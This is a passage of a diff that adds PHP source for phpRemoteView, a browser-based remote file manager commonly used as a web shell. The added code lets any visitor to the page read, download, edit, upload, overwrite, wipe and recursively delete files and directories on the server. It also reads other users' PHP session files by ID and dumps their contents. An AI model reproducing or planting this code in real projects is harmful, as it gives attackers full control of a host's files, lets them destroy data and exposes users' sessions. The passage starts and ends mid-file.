+   ".mm("Free download")." - <a href='http://php.spb.ru/remview/'>http://php.spb.ru/remview/</a></b></font></td>
+   </tr></table>";
+
+break;
+
+
+case "set": 
+
+   switch ($c2) {
+      case "sort":
+         $name=intval($name);
+         if ($name==$cc[0]) if ($cc[1]==='0') $cc[1]='1'; else $cc[1]='0';
+         $cc[0]=$name;
+         break;
+
+      case "panel":
+         $cn='';
+         foreach ($names as $k=>$v) {
+            if ($v!="") $cn.=substr($v,0,1);
+         }
+         $cc[0]=substr($sort,0,1);
+         $cc[1]=substr($sortby,0,1);
+         $cp[2]=substr($datetime,0,50);
+         $cp[3]=substr($fontname,0,50);
+         $cp[4]=substr($fontsize,0,50);
+
+         //exit("cn=$cn<br>cc=$cc");
+         break;
+
+      case "eng":
+         $cc[5]=1;
+         break;
+
+      case "rus":
+         $cc[5]=2;
+         break;
+
+   }
+
+
+   $cookie=$cc."~".$cn."~".$cp[2]."~".$cp[3]."~".$cp[4];
+   if ($c2=="reset") $cookie=implode("~",$cp_def);
+   //echo "<script>alert('$cookie')</script>";
+   setcookie("cp$pan",$cookie,time()+24*60*60*333,'/');
+   header("Location: $ref");
+   echo "<script>location.href=\"$ref\";</script>";
+   //echo "[$ref]";
+   //phpinfo();
+   break;
+
+
+case "setup": 
+
+   echo $GLOBALS['html'];
+
+   echo "<center><h3><b>phpRemoteView ".mm("setup")."</b> [<A href='javascript:history.go(-1)'>".mm("back")."</a>]</h3></center><hr size=1 noshade>";
+
+   echo "<STYLE>
+   .setup {
+      font-size: 8pt;
+      font-family: Tahoma;
+   }
+   HTML, TD {font: 90%}
+   </STYLE>";
+
+   echo "
+   <b><u>".mm("Reset all settings")."</u></b>: <a href=$self?c=set&c2=reset&pan=$panel&ref=$ref>".mm("clear")."</a>";
+   echo " <font color=white>(".mm("Current").": <small>".implode(" | ",$cp)."</small>)</font><P>";
+
+   echo "
+   <form action=$self method=post>
+   <input type=hidden name=c value=\"set\">
+   <input type=hidden name=c2 value=\"panel\">
+   <input type=hidden name=pan value=\"$panel\">
+   <input type=hidden name=ref value=\"$ref\">
+   ";
+   echo "<b><u>".mm("Colums and sort")."</u></b><br>";
+
+   echo "".mm("Sort order").": ";
+   echo "<input type=radio name=sortby value=0 id=q3 ".($cc[1]=='0'?"checked":"").">";
+   echo "<label for=q3>".mm("Ascending sort")."</label>";
+   echo "<input type=radio name=sortby value=1 id=q4 ".($cc[1]=='1'?"checked":"").">";
+   echo "<label for=q4>".mm("Descending sort")."</label><br>";
+
+   echo "<input type=radio name=sort value='n' id=q1 ".($cc[0]=='n'?"checked":"").">";
+   echo "<label for=q1>".mm("Sort by filename")."</label>";
+   echo "<input type=radio name=sort value='e' id=q2 ".($cc[0]=='e'?"checked":"").">";
+   echo "<label for=q2>".mm("Sort by filename extension")."</label>";
+   echo "<table border=0 cellspacing=0 cellpadding=3>";
+   for ($i=0; $i<2; $i++) {
+      echo "<tr>";
+      for ($j=0; $j<7; $j++) {
+         $n=$j+$i*7;
+         echo "<td align=center><label for=$n>Sort by ".($n+1)."</label>";
+         echo "<input type=radio name=sort value=$n id=$n ".($cc[0]=="$n"?"checked":"").">";
+         echo "<br><select class=setup name=names[] size=".(count($cn_name)+1).">";
+         echo "<option value=''>--hidden--";
+         foreach ($cn_name as $kk=>$vv) 
+            echo "<option value='$kk'".($n<strlen($cn) && $cn[$n]==$kk?" selected":"").">$vv";
+         echo "</select>";
+      }
+      echo "</tr>";
+   }
+   echo "</table><P>";
+
+   echo "<b><u>".mm("Date/time format")."</u></b>: <input type=text name=datetime value=\"$cp[2]\"><br>
+   d - day, m - month, y - year2, Y - year4, H - hour, m - minute, s - second<P>";
+
+   echo "<b><u>".mm("Panel font & size")."</u></b>: 
+   <input type=text name=fontname value=\"$cp[3]\" size=12> 
+   <input type=text name=fontsize value=\"$cp[4]\" size=2>pt<P>";
+
+   echo "<P><center><input type=submit value='&nbsp; &nbsp; S &nbsp; U &nbsp; B &nbsp; M &nbsp; I &nbsp; T &nbsp; &nbsp;'></center></form>";
+
+   
+   echo "<hr size=1 noshade>";
+   break;
+
+
+
+// view
+case "v":
+
+
+   if (!isset($fnot)) $fnot=0;
+   if (!isset($ftype)) $ftype=0;
+   
+   if ($fnot==0) {
+      echo $GLOBALS['html'];
+      up($d,$f);
+      echo "<a href=$self?&c=l&d=".urlencode($d)."><nobr>&lt;&lt;&lt;<b>".mm("back to directory")."</b> &gt;&gt;&gt;</nobr></a>";
+      up_link($d,$f);
+      echo "<hr size=1 noshade>";
+   }      
+   if (!realpath($d.$f) || !file_exists($d.$f)) exit("".mm("file not found")."");
+   if (!is_file($d.$f) || !$fi=@fopen($d.$f,"rb")) exit("<p><font color=red><b>".mm("access denied")."</b></font>");
+
+   if ($ftype==0 || $ftype==4) {
+      $buf=fread($fi,max(filesize($d.$f),$maxsize_fread));
+      fclose($fi);
+   }
+
+
+   switch ($ftype) {
+
+   case 0: 
+      echo "<pre>".htmlspecialchars($buf)."</pre>";
+      break;
+
+   case 1: 
+      readfile($d.$f); 
+      break;
+
+   case 2: 
+      header("Content-type: image/gif"); 
+      readfile($d.$f); 
+      break;
+
+   case 3: // download
+
+      if (isset($fatt) && strlen($fatt)>0) {
+          $attach=$fatt; 
+          header("Content-type: text/plain"); 
+      } 
+      else {
+          $attach=$f;
+          header("Content-type: phpspbru"); 
+      }
+      header("Content-disposition: attachment; filename=\"$attach\";"); 
+      readfile($d.$f); 
+      break;
+
+   case 4: // session
+   
+      echo "<xmp>";
+      if (substr($f,0,5)=="sess_" && preg_match("!^sess_([a-z0-9]{32})$!i",$f,$ok)) {
+         ini_set("session.save_path",$d);
+         session_id($ok[1]);
+         session_start();
+         print_r($HTTP_SESSION_VARS);
+      }
+      else {
+         print_r(unserialize($buf));
+      }
+      echo "</xmp>";//<hr size=1 noshade><xmp>";
+      break;
+
+   }
+
+   break;
+
+
+
+
+
+
+
+case "i": // information for FILE
+
+   echo $GLOBALS['html'];
+   up($d,$f);
+   echo "<a href=$self?&c=l&d=".urlencode($d)."><nobr>&lt;&lt;&lt;<b>".mm("back to directory")."</b> &gt;&gt;&gt;</nobr></a>";
+   up_link($d,$f);
+
+   if (!realpath($d.$f) || !file_exists($d.$f)) exit(mm("file not found"));
+
+   echo "<P><big><b><tt>".htmlspecialchars($d.$f)."</tt></b></big><P>";
+   echo "<table class=tab border=0 cellspacing=1 cellpadding=2>";
+   echo "<tr class=tr><td>".mm("Size")."        </td><td> ".filesize($d.$f)."</td></tR>";
+   echo "<tr class=tr><td>".mm("Owner")."/".mm("Group")." </td><td> ";      
+   $tmp=@_posix_getpwuid(fileowner($d.$f));
+   if (!isset($tmp['name']) || $tmp['name']=="") echo fileowner($d.$f)." ";
+   else echo $tmp['name']." ";
+   $tmp=@_posix_getgrgid(filegroup($d.$f));
+   if (!isset($tmp['name']) || $tmp['name']=="") echo filegroup($d.$f);
+   else echo $tmp['name'];
+   echo "<tr class=tr><td>".mm("FileType")."    </td><td> ".filetype($d.$f)."</td></tr>";
+   echo "<tr class=tr><td>".mm("Perms")."       </td><td> ".display_perms(fileperms($d.$f))."</td></tr>";
+   echo "<tr class=tr><td>".mm("Create time")." </td><td> ".date("d/m/Y H:i:s",filectime($d.$f))."</td></tr>";
+   echo "<tr class=tr><td>".mm("Access time")." </td><td> ".date("d/m/Y H:i:s",fileatime($d.$f))."</td></tr>";
+   echo "<tr class=tr><td>".mm("MODIFY time")." </td><td> ".date("d/m/Y H:i:s",filemtime($d.$f))."</td></tr>";
+   echo "</table><P>";
+
+   $fi=@fopen($d.$f,"rb");
+   if ($fi) {
+      $str=fread($fi,$hexdump_lines*$hexdump_rows);
+      echo "<b>".mm("HEXDUMP PREVIEW")."</b>";
+      $n=0;
+      $a0="00000000<br>";
+      $a1="";
+      $a2="";
+      for ($i=0; $i<strlen($str); $i++) {
+         $a1.=sprintf("%02X",ord($str[$i])).' ';
+         switch (ord($str[$i])) {
+            case 0:  $a2.="<font class=s2>0</font>"; break;
+            case 32: 
+            case 10:
+            case 13: $a2.="&nbsp;"; break;
+            default:  $a2.=htmlspecialchars($str[$i]);
+         }
+         $n++;
+         if ($n==$hexdump_rows) {
+            $n=0;
+            if ($i+1<strlen($str)) $a0.=sprintf("%08X",$i+1)."<br>";
+            $a1.="<br>";
+            $a2.="<br>";
+         }
+      }
+      //if ($a1!="") $a0.=sprintf("%08X",$i)."<br>";
+      echo "<table border=0 bgcolor=#cccccc cellspacing=1 cellpadding=4 ".
+         "class=sy><tr><td bgcolor=#e0e0e0>$a0</td><td bgcolor=white>".
+         "$a1</td><td bgcolor=white>$a2</td></tr></table><p>";
+   }
+   
+   echo "<b>Base64: </b>
+   <nobr>[<a href=$self?c=base64&c2=0&d=".urlencode($d)."&f=".urlencode($f).">Encode</a>]&nbsp;</nobr>
+   <nobr>[<a href=$self?c=base64&c2=1&d=".urlencode($d)."&f=".urlencode($f).">+chunk</a>]&nbsp;</nobr>
+   <nobr>[<a href=$self?c=base64&c2=2&d=".urlencode($d)."&f=".urlencode($f).">+chunk+quotes</a>]&nbsp;</nobr>
+   <nobr>[<a href=$self?c=base64&c2=3&d=".urlencode($d)."&f=".urlencode($f).">Decode</a>]&nbsp;</nobr>
+   <P>";
+
+
+   if (!$write_access) exitw();
+
+   $msg="";
+   if (!is_file($d.$f) || !$fi=@fopen($d.$f,"r+")) $msg=" (<font color=red><b>".mm("ONLY READ ACCESS")."</b></font>)";
+   else fclose($fi);
+   if (!is_file($d.$f) || !$fi=@fopen($d.$f,"r")) $msg=" (<font color=red><b>".mm("Can't READ file - access denied")."</b></font>)";
+   else fclose($fi);
+   if ($msg=="") $msg=" (".mm("full read/write access").")";
+
+   echo "<b>".mm("FILE SYSTEM COMMANDS")."$msg</b><p>";
+
+   echo "
+<table border=0 cellspacing=0 cellpadding=0><tr>
+
+<td bgcolor=#cccccc><a href=$self?c=e&d=".urlencode($d)."&f=".urlencode($f).
+"><b>&nbsp;&nbsp;".mm("EDIT")."&nbsp;&nbsp;<br>&nbsp;&nbsp;".mm("FILE")."&nbsp;&nbsp;</b></a></td>
+<td>&nbsp;&nbsp;&nbsp;</td>
+
+<td><form action=$self method=post>
+<input type=hidden name=c value=delete>
+<input type=hidden name=c2 value=delete>
+<input type=hidden name=d value=\"".htmlspecialchars($d)."\">
+<input type=hidden name=f value=\"".htmlspecialchars($f)."\">
+<input type=submit value='".mm("DELETE")."'><small>&gt;</small><input type=checkbox name=confirm value=delete></nobr><br>
+<small>".mm("Delete this file")."</small>
+</td><td></form></td><td>&nbsp;&nbsp;&nbsp;</td>
+
+<td><form action=$self method=post>
+<input type=hidden name=c value=delete>
+<input type=hidden name=c2 value=clean>
+<input type=hidden name=d value=\"".htmlspecialchars($d)."\">
+<input type=hidden name=f value=\"".htmlspecialchars($f)."\">
+<input type=submit value='".mm("CLEAN")."'><small>&gt;</small><input type=checkbox name=confirm value=touch></nobr><br>
+<small>".mm("filesize to 0byte")."</small>
+</td><td></form></td><td>&nbsp;&nbsp;&nbsp;</td>
+
+<td><form action=$self method=post>
+<input type=hidden name=c value=delete>
+<input type=hidden name=c2 value=touch>
+<input type=hidden name=d value=\"".htmlspecialchars($d)."\">
+<input type=hidden name=f value=\"".htmlspecialchars($f)."\">
+<input type=submit value='".mm("TOUCH")."'><small>&gt;</small><input type=checkbox name=confirm value=touch></nobr><br>
+<small>".mm("Set current 'mtime'")."</small>
+</td><td></form></td><td>&nbsp;&nbsp;&nbsp;</td>
+
+<td><form action=$self method=post>
+<input type=hidden name=c value=delete>
+<input type=hidden name=c2 value=wipe>
+<input type=hidden name=d value=\"".htmlspecialchars($d)."\">
+<input type=hidden name=f value=\"".htmlspecialchars($f)."\">
+<input type=submit value='".mm("WIPE(delete)")."'><small>&gt;</small><input type=checkbox name=confirm value=delete></nobr><br>
+<small>".mm("Write '0000..' and delete")."</small>
+</td><td></form></td><td>&nbsp;&nbsp;&nbsp;</td>
+</tr></table>
+";
+
+   echo "<form action=$self method=post><input type=hidden name=c value=copy>".
+        "<b>".mm("COPY FILE")."</b> ".mm("from")." <input type=text size=40 name=from value=\"".htmlspecialchars($d.$f)."\">".
+        " ".mm("to")." <input type=text name=to size=40 value=\"".htmlspecialchars($d.$f)."\">".
+        "<nobr><input type=submit value='".mm("COPY")."!'>".
+        "&gt;<input type=checkbox name=confirm value=copy></nobr></form>";
+
+echo "
+<form action=$self method=post>
+<b>".mm("MAKE DIR")."</b> (".mm("type full path").")
+<input type=hidden name=c value=newdir_submit>
+<input type=text size=60 name=df value=\"".htmlspecialchars($d)."\">
+<input type=submit value='".mm("MkDir")."'>
+</form>";
+
+
+echo "
+<form action=$self method=post>
+<b>".mm("CREATE NEW FILE or override old file")."</b><br>
+<input type=hidden name=c value=newfile_submit>
+".mm("Full file name")." <input type=text size=50 name=df value=\"".htmlspecialchars($d.$f)."\">
+<input type=submit value='".mm("CREATE/OVERRIDE")."'>
+<input type=checkbox name=confirm value=1 id=conf1><label for=conf1>&lt;=confirm</label><br>
+<textarea name=text cols=70 rows=10 style='width: 100%;'></textarea><br>
+</form>";
+
+echo "
+<form enctype='multipart/form-data' action='$self' method=post>
+<input type=hidden name=c value=fileupload_submit>
+<b>FILE UPLOAD: ".mm("CREATE NEW FILE or override old file")."</b><br>
+<input type=hidden name='MAX_FILE_SIZE' value=999000000>
+1. ".mm("select file on your local computer").": <input name=userfile type=file><br>
+2. ".mm("save this file on path").": 
+  <input name=df size=50 value=\"$d$f\"><br>
+3. <input type=checkbox name=df2 value=1 id=df2 checked>
+  <label for=df2>".mm("create file name automatic")."</label>
+  &nbsp;&nbsp;".mm("OR")."&nbsp;&nbsp;
+  ".mm("type any file name").":
+  <input name=df3 size=20><br>
+4. <input type=checkbox name=df4 value=1 id=df4>
+  <label for=df4>".mm("convert file name to lovercase")."</label><br>
+<input type=submit value='".mm("Send File")."'>
+</form>";
+
+break;
+
+
+case "base64":
+
+   echo "<pre>\n";
+   $ff=fopen($d.$f,"rb") or exit("<p>access denied");
+   $text=fread($ff,max(filesize($d.$f),$maxsize_fread));
+   fclose($ff);
+   switch ($c2) {
+      case 0:
+         echo base64_encode($text);
+         break;
+      case 1:
+         echo chunk_split(base64_encode($text));
+         break;
+      case 2:
+         $text=base64_encode($text);
+         echo substr(preg_replace("!.{1,76}!","'\\0'.\n",$text),0,-2);
+         break;
+      case 3:
+         echo base64_decode($text);
+         break;
+   }
+   break;
+
+
+
+case "d": // information for DIRECTORY
+
+   echo $GLOBALS['html'];
+   up($d,"","Directory");
+   echo "<a href=$self?&c=l&d=".urlencode($d)."><nobr>&lt;&lt;&lt;<b>".mm("back to directory")."</b> &gt;&gt;&gt;</nobr></a>";
+   echo "<p>";
+
+   //up_link($d,"");
+
+   if (!realpath($d) || !is_dir($d.$f)) exit(mm("dir not found"));
+
+   echo "<table border=0 cellspacing=0 cellpadding=0><tr><td>";
+
+   echo "<table border=0 cellspacing=1 cellpadding=1 class=tab>";
+   echo "<tr class=tr><td>&nbsp;&nbsp;&nbsp;".mm("Owner")."/".mm("Group")."&nbsp;&nbsp;&nbsp;</td><td>";      
+   $tmp=@_posix_getpwuid(fileowner($d.$f));
+   if (!isset($tmp['name']) || $tmp['name']=="") echo fileowner($d.$f)." ";
+   else echo $tmp['name']." ";
+   $tmp=@_posix_getgrgid(filegroup($d.$f));
+   if (!isset($tmp['name']) || $tmp['name']=="") echo filegroup($d.$f);
+   else echo $tmp['name'];
+   echo "</td></tr><tr class=tr><td>";
+   echo mm("Perms")."</td><td>".display_perms(fileperms($d.$f))."</td></tr><tr class=tr><td>";
+   echo mm("Create time")."</td><td>".date("d/m/Y H:i:s",filectime($d.$f))."</td></tr><tr class=tr><td>";
+   echo mm("Access time")."</td><td>".date("d/m/Y H:i:s",fileatime($d.$f))."</td></tr><tr class=tr><td>";
+   echo mm("MODIFY time")."</td><td>".date("d/m/Y H:i:s",filemtime($d.$f))."</td></tr></table>";
+
+   echo "</tD><form action=$self method=get><td width=70>&nbsp;</td><td>
+   <input type=hidden name=c value=\"tree\">
+   Root <input type=text name=d value=\"$d\"><br>
+   <input type=checkbox name=showfile value=1 id=tree1><label for=tree1>Show files in tree</label><br>
+   <input type=checkbox name=showsize value=1 id=tree2 checked><label for=tree2>Show dir/files size</label><br>
+   <input type=submit value='Show TREE directory'>";
+
+   echo "</td></form></tr></table><P>";
+
+
+   
+   if (!$write_access) exitw();
+
+   echo "<b>".mm("FILE SYSTEM COMMANDS")."</b><p>";
+
+   echo "
+<table border=0 cellspacing=0 cellpadding=0><tr>
+
+<td><form action=$self method=post>
+<input type=hidden name=c value=dirdelete>
+<input type=hidden name=c2 value=files>
+<input type=hidden name=d value=\"".htmlspecialchars($d)."\">
+<input type=hidden name=ref value=\"$url\">
+<input type=submit value='".mm("Delete all files in dir")." (rm *)'><small>&gt;</small><input type=checkbox name=confirm value=delete></nobr>
+</td><td></form></td><td>&nbsp;&nbsp;&nbsp;</td>
+
+<td><form action=$self method=post>
+<input type=hidden name=c value=dirdelete>
+<input type=hidden name=c2 value=dir>
+<input type=hidden name=d value=\"".htmlspecialchars($d)."\">
+<input type=hidden name=ref value=\"$url\">
+<input type=submit value='".mm("Delete all dir/files recursive")." (rm -fr)'><small>&gt;</small><input type=checkbox name=confirm value=delete></nobr>
+</td><td></form></td><td>&nbsp;&nbsp;&nbsp;</td>
+
+</tr></table>
+";
+
+echo "
+<form action=$self method=post>
+<b>".mm("MAKE DIR")."</b> (type full path)
+<input type=hidden name=c value=newdir_submit>
+<input type=text size=60 name=df value=\"".htmlspecialchars($d)."\">
+<input type=submit value='".mm("MkDir")."'>
+</form>";
+
+
+echo "
+<form action=$self method=post>
+<b>".mm("CREATE NEW FILE or override old file")."</b><br>
+<input type=hidden name=c value=newfile_submit>
+".mm("Full file name")." <input type=text size=50 name=df value=\"".htmlspecialchars($d)."\">
+<input type=submit value='".mm("CREATE/OVERRIDE")."'>
+<input type=checkbox name=confirm value=1 id=conf1><label for=conf1>&lt;=confirm</label><br>
+<textarea name=text cols=70 rows=10 style='width: 100%;'></textarea><br>
+</form>";
+
+echo "
+<form enctype='multipart/form-data' action='$self' method=post>
+<input type=hidden name=c value=fileupload_submit>
+<b>(FILE UPLOAD) ".mm("CREATE NEW FILE or override old file")."</b><br>
+<input type=hidden name='MAX_FILE_SIZE' value=999000000>
+1. ".mm("select file on your local computer").": <input name=userfile type=file><br>
+2. ".mm("save this file on path").": 
+  <input name=df size=50 value=\"".realpath($d)."/\"><br>
+3. <input type=checkbox name=df2 value=1 id=df2 checked>
+  <label for=df2>".mm("create file name automatic")."</label>
+  &nbsp;&nbsp;".mm("OR")."&nbsp;&nbsp;
+  ".mm("type any file name").":
+  <input name=df3 size=20><br>
+4. <input type=checkbox name=df4 value=1 id=df4>
+  <label for=df4>".mm("convert file name to lovercase")."</label><br>
+<input type=submit value='".mm("Send File")."'>
+</form>";
+
+
+break;
+
+
+
+case "tree":
+
+$tcolors=array(
+'eee','ddd','ccc','bbb','aaa','999','888','988','a88','b88','c88','d88','e88','d98',
+'ca8','bb8','ac8','9d8','8e8','8d9','8ca','8bb','8ac','89d','88e');
+
+function dir_tree($df,$level=0) {
+   global $tcolors,$self;
+
+   $df=str_replace("//","/",$df);
+   $dirs=array();
+   $files=array();
+   if ($dir=opendir($df)) {
+      while (($file=readdir($dir))!==false) {
+         if ($file=="." || $file=="..") continue;
+         if (is_dir("$df/$file"))  {
+            $dirs[]=$file;
+         }
+         else {
+            $files[]=$file;
+         }
+      }
+   }
+   closedir($dir);
+
+   sort($dirs);
+   sort($files);
+   
+   $i=min($level,count($tcolors)-1);
+   $c=$tcolors[$i][0].$tcolors[$i][0].$tcolors[$i][1].$tcolors[$i][1].$tcolors[$i][2].$tcolors[$i][2];
+
+   echo "\r\n\r\n\r\n
+   <table width=100% border=0 cellspacing=2 cellpadding=1><tr><td bgcolor=#000000>
+   <table width=100% border=0 cellspacing=0 cellpadding=1 bgcolor=#$c>
+   <tr><td colspan=3 class=dir>".
+   "<a href=$self?c=l&d=".urlencode($df)." class=dir><img src=$self?name=dir&c=img&1 border=0>".
+   $df."</a></td></tr>";
+
+   if (count($dirs) || count($files)) {
+      echo "<tr><td width=15>&nbsp;</td><td class=all width=97%>";
+      for ($i=0; $i<count($files); $i++) {
+         echo $files[$i]." ";
+      }
+      for ($i=0; $i<count($dirs); $i++) {
+         dir_tree($df."/".$dirs[$i],$level+1);
+      }
+      echo "</td><td width=10>&nbsp;</td></tr>";
+   }
+   echo '</table></td></tr></table>';
+}
+
+   echo "
+   <STYLE>
+   .all {
+   font-family: Verdana;
+   font-size: 80%;
+   }
+   .dir {
+   font-family: Verdana;
+   font-size: 95%;
+   background: #666699;
+   font-weight: bold;
+   color: white
+   }
+   </STYLE>";
+   echo $GLOBALS['html'];
+
+   up($d,"","Directory");
+   echo "<a href=$self?&c=l&d=".urlencode($d)."><nobr>&lt;&lt;&lt;<b>".mm("back to directory")."</b> &gt;&gt;&gt;</nobr></a>";
+   echo "<p>";
+   dir_tree($d);
+   break;
+
+
+
+case "delete":
+
+   if (!$write_access) exitw();
+
+   if (!isset($c2)) exit("err# delete 1");
+   if (!isset($confirm) || strlen($confirm)<3) exit("".mm("Confirm not found (go back and set checkbox)")."");
+   echo "<a href=$self?&c=l&d=".urlencode($d)."><nobr>&lt;&lt;&lt;<b>".mm("back to directory")."</b> &gt;&gt;&gt;</nobr></a><p>";
+   if (!isset($d) || !isset($f) || !@file_exists($d.$f) || !@realpath($d.$f)) 
+      exit("".mm("Delete cancel - File not found")."");
+   if (realpath(getenv("SCRIPT_FILENAME"))==$d.$f && !isset($delete_remview_confirm))
+      exit(mm("Do you want delete this script (phpRemoteView) ???")."<br><br><br><br>
+      <a href='$self?c=delete&c2=$c2&confirm=delete&d=".urlencode($d)."&f=".urlencode($f)."&delete_remview_confirm=YES'>[".mm("YES").", ".mm("DELETE")." <b>".mm("ME")."</b>]</a>
+       &nbsp; &nbsp; &nbsp;
+      <a href='javascript:history.back(-1)'>[".mm("NO (back)")."]</a>");
+
+   switch ($c2) {
+   case "delete":
+       //exit("$d $f");
+       ob();
+       if (!unlink($d.$f)) 
+          obb().exit("<font color=red><b>".mm("Delete cancel")." - ".mm("ACCESS DENIED")."</b></font>$obb"); 
+       Header("Location: $self?c=l&d=".urlencode($d));
+       echo "<P><a href=$self?c=l&d=".urlencode($d).">".mm("done (go back)")."!</a><p>";
+       echo "".mm("Delete ok")."";
+       break;
+   case "touch":
+       ob();
+       if (!touch($d.$f)) 
+          obb().exit("<font color=red><b>".mm("Touch cancel")." - ".mm("ACCESS DENIED")."</b></font>$obb"); 
+       Header("Location: $self?c=i&d=".urlencode($d)."&f=".urlencode($f));
+       echo "<a href=$self?c=i&d=".urlencode($d)."&f=".urlencode($f).">".mm("done (go back)")."!</a><p>";
+       echo "".mm("Touch ok (set current time to 'modify time')")."";
+       break;
+   case "clean":
+       ob();
+       $fi=fopen($d.$f,"w+") or 
+          obb().exit("<font color=red><b>".mm("Clean (empty file) cancel")." - ".mm("ACCESS DENIED")."</b></font>obb"); 
+       ftruncate($fi,0);
+       fclose($fi);
+       Header("Location: $self?c=i&d=".urlencode($d)."&f=".urlencode($f));
+       echo "<a href=$self?c=i&d=".urlencode($d)."&f=".urlencode($f).">".mm("done (go back)")."!</a><p>";
+       echo "".mm("Clean ok (file now empty)")."";
+       break;
+   case "wipe":
+       $size=filesize($d.$f);
+       ob();
+       $fi=fopen($d.$f,"w+") or 
+          obb().exit("<font color=red><b>".mm("Wipe cancel - access denied")."</b></font>$obb");
+       $str=md5("phpspbru".mt_rand(0,999999999).time());
+       for ($i=0; $i<5; $i++) $str.=$str; // strlen 1024 byte
+       for ($i=0; $i<intval($size/1024)+1; $i++) fwrite($fi,$str);
+       fclose($fi);
+       ob();
+       if (!unlink($d.$f)) 
+          obb().exit("err# delete 2 - file was rewrite, but not delete...(only write access, delete disable)$obb"); 
+       Header("Location: $self?c=l&d=".urlencode($d));
+       echo "<a href=$self?c=i&d=".urlencode($d).">".mm("done (go back)")."!</a><p>";
+       echo "".mm("Wipe ok (file deleted)")."";
+       break;
+   }
+
+   //Header("Location: $self?c=l&d=".urlencode(dirname($df)));
+   //echo "<a href=$self?c=i&d=".urlencode(dirname($df)).">SAVE NEW FILE DONE (go back)!</a>";
+
+   break;
+
+
+case "dirdelete":
+
+   if (!$write_access) exitw();
+
+function dir_delete($df) {
+   echo "<b>".basename($df)."</b><ul>";
+   if ($dir=opendir($df)) {
+      $i=0;
+      while (($file=readdir($dir))!==false) {
+         if ($file=="." || $file=="..") continue;
+         if (is_dir("$df/$file"))  {
+            dir_delete($df."/".$file);
+         } 
+         else {
+            echo "$file<br>";
+            echo "".mm("DELETE")." <tt>$df/$file</tt> ...<br>";
+            unlink($df."/".$file);
+         }
+         $i++;
+      }
+      //if ($i==0) echo "-empty-<br>";
+   }
+   closedir($dir);
+   echo "</ul>";
+   echo "".mm("DELETE")." ".mm("DIR")." <tt>$df</tt> ...<br>";
+   rmdir("$df/$file");
+}
+
+   if (!isset($c2)) exit("error dirdelete 1");
+   if (!isset($confirm)) exit("".mm("Confirm not found (go back and set checkbox)")."!");
+   $df="$d";
+
+   switch ($c2) {
+
+      case "files":
+         echo "<h3>".mm("Deleting all files in")." <tt>$df</tt> ...</h3>";
+         if ($dir=opendir($df)) {
+            while (($file=readdir($dir))!==false) {
+                if ($file=="." || $file=="..") continue;
+                if (is_dir($df.$file))  {
+                   echo "<big><tt><b>>$file</b></tt></big> ".mm("skip").": ".filetype($df.$file)."<br>";
+                }
+                elseif (is_file($df.$file)) {
+                   echo "<big><tt><b><font color=red>$file</font></b></tt></big> ".mm("deleting")."...";
+                   unlink($df.$file);
+                   echo "<br>";
+                }
+                else {
+                   echo "<big><tt><b>$file</b></tt></big> ".mm("skip").": ".filetype($df.$file)."<br>";
+                }
+            }  
+         }
+         closedir($dir);
+         $ref="$self?c=l&d=".urlencode($d);
+         break;
+   
+      case "dir":
+         echo "<h3>".mm("Deleting all dir/files (recursive) in")." <tt>$df</tt> ...</h3>";
+         dir_delete($df);
+         $ref="$self?c=l&d=".urlencode(realpath($d."/.."));
+         break;
+   }
+   //header("Location: $ref");
+   echo "<p><a href=$ref>".mm("DONE, go back")."</a>";
+   break;
+
+case "copy": 
+
+   if (!$write_access) exitw();
+
+   if (!isset($from) || !@file_exists($from) || !@realpath($from))
+      exit("err# copy 1, file [$from] not found");
+   if (!isset($to) || strlen($to)==0)
+      exit("err# copy 2, file [$to] not found");
+   echo "Copy: ....<hr size=1 noshade>";
+   if (!copy($from,$to)) { 
+      echo "<hr size=1 noshade><font color=red><b>Error!</b></font><p>";
+      echo "View <a href=$self?c=l&d=".urlencode(dirname($from)).">".dirname($from)."<p>";
+   }
+   else
+      echo "".mm("DONE")."!<p>";
+      echo "View <a href=$self?c=l&d=".urlencode(dirname($from)).">".dirname($from)."</a> (dir 'from')<p>";
+      echo "View <a href=$self?c=l&d=".urlencode(dirname($to)).">".dirname($to)."</a> (dir 'to')<p>";
+   break;
+
+
+
+
+case "e": // edit
+
+   if (!$write_access) exitw();
+
+   if (!@realpath($d.$f) || !file_exists($d.$f)) exit("".mm("file not found")."");
+   echo $GLOBALS['html'];
+   up($d,$f);
+   echo "<a href=$self?&c=l&d=".urlencode($d)."><nobr>&lt;&lt;&lt;<b>".mm("back to directory")."</b> &gt;&gt;&gt;</nobr></a>";
+   up_link($d,$f);
+   $msg="";
+   if (!is_file($d.$f) || !$fi=@fopen($d.$f,"r+")) $msg=" (<font color=red><b>".mm("ONLY READ ACCESS (don't edit!)")."</b></font>)";
+   else fclose($fi);
+   if (!is_file($d.$f) || !$fi=@fopen($d.$f,"r")) $msg=" (<font color=red><b>".mm("Can't READ file - access denied (don't edit!)")."</b></font>)";
+   else fclose($fi);
+   if ($msg=="") $msg="(<font color=#009900><b>".mm("full read/write access")."</b></font>)";
+   echo "<p><b>".mm("EDIT FILE")."</b> $msg<p>";
+
+   if (!$fi=@fopen($d.$f,"rb")) exit("".mm("can't open, access denied")."");
+   echo "<form action=$self method=post>
+   <input type=hidden name=c value=e_submit>
+   <input type=hidden name=d value=\"".htmlspecialchars($d)."\">
+   <input type=hidden name=f value=\"".htmlspecialchars($f)."\">
+   <textarea name=text cols=70 rows=20 style='width: 100%;'>".
+   htmlspecialchars(fread($fi,filesize($d.$f)))."</textarea><p>
+   <input type=submit value=' ".mm("SAVE FILE (write to disk)")." '>
+   <input type=checkbox name=confirm value=1 id=conf> 
+   <label for=conf><font color=red><b><= confirm</b></font></label>
+   </form>";
+
+   break;
+
+
+case "e_submit":
+
+   if (!$write_access) exitw();
+
+   if (!realpath($d.$f) || !file_exists($d.$f)) exit("file not found");
+   if (!isset($text)) exit("err# e_submit 1");
+   if (!isset($confirm)) exit("Confirm not found (go back and set checkbox)");
+   if (!$fi=@fopen($d.$f,"w+")) exit("access denied");
+   fwrite($fi,$text);
+   fclose($fi);
+   Header("Location: $self?c=i&d=".urlencode($d)."&f=".urlencode($f));
+   echo "<a href=$self?c=i&d=".urlencode($d)."&f=".urlencode($f).">SAVE DONE (go back)!</a>";
+
+   break;
+
+
+
+case "newfile_submit":
+
+   if (!$write_access) exitw();
+
+   if (!isset($text) || !isset($df)) exit("err# newfile_submit 1");
+   if (!isset($confirm)) exit("Confirm not found (go back and set checkbox)");
+   if (!$fi=@fopen($df,"w+")) exit("access denied, can't create/open [$df]");
+   fwrite($fi,$text);
+   fclose($fi);
+   Header("Location: $self?c=l&d=".urlencode(dirname($df)));
+   echo "<a href=$self?c=i&d=".urlencode(dirname($df)).">SAVE NEW FILE DONE (go back)!</a>";
+   break;
+
+
+case "fileupload_submit":
